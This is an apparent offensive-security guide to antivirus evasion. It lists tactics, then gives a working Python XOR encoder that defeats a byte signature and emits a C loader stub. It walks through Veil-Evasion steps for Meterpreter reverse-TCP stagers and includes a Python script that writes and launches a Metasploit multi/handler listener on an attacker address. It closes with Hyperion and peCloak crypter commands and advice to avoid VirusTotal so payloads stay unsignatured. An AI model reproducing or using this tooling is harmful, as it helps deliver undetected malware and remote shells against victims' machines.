Evading Anti-Virus

Tactics to evade anti-virus

  • Shut down or disable the AV (needs local admin, is noisy, and the AV usually logs the gap)
  • Ghost writing: disassemble the binary, insert semantically neutral instructions, and reassemble it so static signatures no longer match
  • Encoding or encrypting the payload so the bytes on disk differ from the known sample; only the small decoder stub stays constant between builds
  • Load the payload directly into memory so nothing is written to disk for an on-access scanner to inspect
  • Custom compilation with varied compiler and linker options so the resulting binary differs from the sample the vendor signatured
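The encoding tactic, as an added example that is not code from the original page or from any of the tools it lists: a naive static scan matches a byte pattern in the raw payload but not in a rolling-XOR-encoded copy, and the same XOR restores it at runtime. The payload bytes are constructed, inert placeholder bytes rather than working shellcode, the signature is a hypothetical pattern chosen to match them, and the emitted C array plus decoder loop is what a hand-written loader stub would embed.

```python
# Added example, not code from the original page or from Veil/Hyperion/peCloak.
# Demonstrates the "encoding" tactic: a static byte signature matches the raw
# payload but not the XOR-encoded copy, and the decoder restores it at runtime.
# The payload bytes below are constructed, inert placeholder bytes (an x64
# prologue followed by NOPs), not a working shellcode, and the signature is a
# hypothetical pattern chosen to match them.
import os

SAMPLE_PAYLOAD = bytes.fromhex("fc4883e4f0e8c0000000415141505251") + b"\x90" * 8
SIGNATURE = bytes.fromhex("fc4883e4f0e8")  # hypothetical AV pattern


def xor_encode(data: bytes, key: bytes) -> bytes:
    """Rolling multi-byte XOR. XOR is its own inverse, so this also decodes."""
    if not key:
        raise ValueError("key must be non-empty")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def matches_signature(blob: bytes, signature: bytes) -> bool:
    """Naive static scan: true if the pattern occurs anywhere in the blob."""
    return signature in blob


def pick_key(data: bytes, signature: bytes, length: int = 4, tries: int = 256) -> bytes:
    """Random key with no zero byte (a zero key byte leaves input bytes unchanged)
    whose encoded output no longer contains the signature."""
    for _ in range(tries):
        key = os.urandom(length)
        if 0 in key:
            continue
        if not matches_signature(xor_encode(data, key), signature):
            return key
    raise RuntimeError("no suitable key found")


def to_c_array(name: str, data: bytes, per_line: int = 12) -> str:
    """Emit the bytes as a C unsigned char array for a loader stub."""
    lines = [f"unsigned char {name}[] = {{"]
    for i in range(0, len(data), per_line):
        chunk = ", ".join(f"0x{b:02x}" for b in data[i:i + per_line])
        lines.append(f"    {chunk},")
    lines.append("};")
    lines.append(f"unsigned int {name}_len = {len(data)};")
    return "\n".join(lines)


DECODER_STUB = """\
/* Decode in place before executing buf. This loop is now the constant part
   of every build, i.e. the thing a vendor can signature next. */
for (unsigned int i = 0; i < buf_len; i++)
    buf[i] ^= key[i % key_len];
"""


def build(data: bytes = SAMPLE_PAYLOAD, signature: bytes = SIGNATURE) -> dict:
    """Encode the payload and return everything a loader build needs."""
    key = pick_key(data, signature)
    encoded = xor_encode(data, key)
    return {
        "key": key,
        "encoded": encoded,
        "raw_flagged": matches_signature(data, signature),
        "encoded_flagged": matches_signature(encoded, signature),
        "c_source": "\n".join([to_c_array("buf", encoded), to_c_array("key", key), DECODER_STUB]),
    }


if __name__ == "__main__":
    result = build()
    print(f"raw payload flagged:     {result['raw_flagged']}")
    print(f"encoded payload flagged: {result['encoded_flagged']}")
    print(result["c_source"])
```

The key is regenerated per build so every output differs, but the decoder loop does not; that stub, not the encoded bytes, is what gets signatured once a sample reaches a vendor, which is why the tools below each ship a different one.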

Veil

Veil-Evasion is another popular framework, written in Python, for generating payloads (Meterpreter stagers wrapped in Python, C, C#, PowerShell and other stubs) that evade many signature-based AV engines.

Start up veil

veil.py

List available payloads

list

Select a payload with use <number> and set its options (at least LHOST and LPORT)

Select a filename to output and generate the payload

Set up exploit/multi/handler in msfconsole with the matching Metasploit payload (e.g. windows/meterpreter/reverse_tcp for a rev_tcp stager) to listen for the reverse TCP connection
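The listener step above, as an added example that is not code from the original page or from Veil or Metasploit: it writes the msfconsole resource script for exploit/multi/handler and launches msfconsole with it when the binary is on PATH. The attacker address 10.0.0.5, port 4443, the output path handler.rc and the windows/meterpreter/reverse_tcp payload are assumed values; the payload must match whatever Veil wrapped.

```python
# Added example, not part of the original page or of Veil/Metasploit.
# Builds the msfconsole resource script for the exploit/multi/handler listener
# that catches the callback from a Veil-generated reverse TCP payload, and
# launches msfconsole with it if it is installed. LHOST, LPORT and the output
# path are assumed values for the demo.
import shutil
import subprocess
from pathlib import Path

DEFAULT_PAYLOAD = "windows/meterpreter/reverse_tcp"  # must match what Veil wrapped


def handler_rc(lhost: str, lport: int, payload: str = DEFAULT_PAYLOAD) -> str:
    """Resource script text. ExitOnSession false plus -j -z keep the listener
    up as a background job, so it catches re-runs of the payload instead of
    dying after the first session."""
    if not (1 <= lport <= 65535):
        raise ValueError(f"invalid port: {lport}")
    if not lhost or any(c.isspace() for c in lhost):
        raise ValueError(f"invalid LHOST: {lhost!r}")
    return "\n".join([
        "use exploit/multi/handler",
        f"set PAYLOAD {payload}",
        f"set LHOST {lhost}",
        f"set LPORT {lport}",
        "set ExitOnSession false",
        "exploit -j -z",
        "",
    ])


def write_handler_rc(path: str, lhost: str, lport: int, payload: str = DEFAULT_PAYLOAD) -> Path:
    """Write the resource script to disk and return its path."""
    rc = Path(path)
    rc.write_text(handler_rc(lhost, lport, payload))
    return rc


def launch_handler(rc_path: Path):
    """Start msfconsole quietly with the resource script; None if not installed."""
    msf = shutil.which("msfconsole")
    if msf is None:
        return None
    return subprocess.Popen([msf, "-q", "-r", str(rc_path)])


if __name__ == "__main__":
    rc = write_handler_rc("handler.rc", "10.0.0.5", 4443)  # assumed attacker IP/port
    print(rc.read_text())
    proc = launch_handler(rc)
    if proc is None:
        print("msfconsole not found; run: msfconsole -q -r handler.rc")
```

Without ExitOnSession false the handler exits as soon as the first Meterpreter session lands, so a second execution of the payload on another host has nothing to connect back to.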

Hyperion

Hyperion is a runtime PE crypter: it AES-encrypts the input executable under a deliberately small key that the stub brute-forces when the program starts, so the payload is never stored on disk in the clear. It is a Windows binary, hence wine on Linux.

wine hyperion.exe [input file] [output file]

The unpacking stub itself is well known to vendors by now, so scan the output before relying on it.

peCloak

peCloak.py encodes the executable's code section and injects a decoder stub, together with some instructions intended to defeat AV heuristics; it is an experiment rather than a maintained tool, and the article below explains the approach.

python peCloak.py [input file]

https://www.securitysift.com/pecloak-py-an-experiment-in-av-evasion/

Virus checker that does not distribute samples to AV vendors

https://nodistribute.com/

Do not test a payload on VirusTotal: uploaded samples are shared with vendors, so a payload that scans clean there will be signatured shortly afterwards.
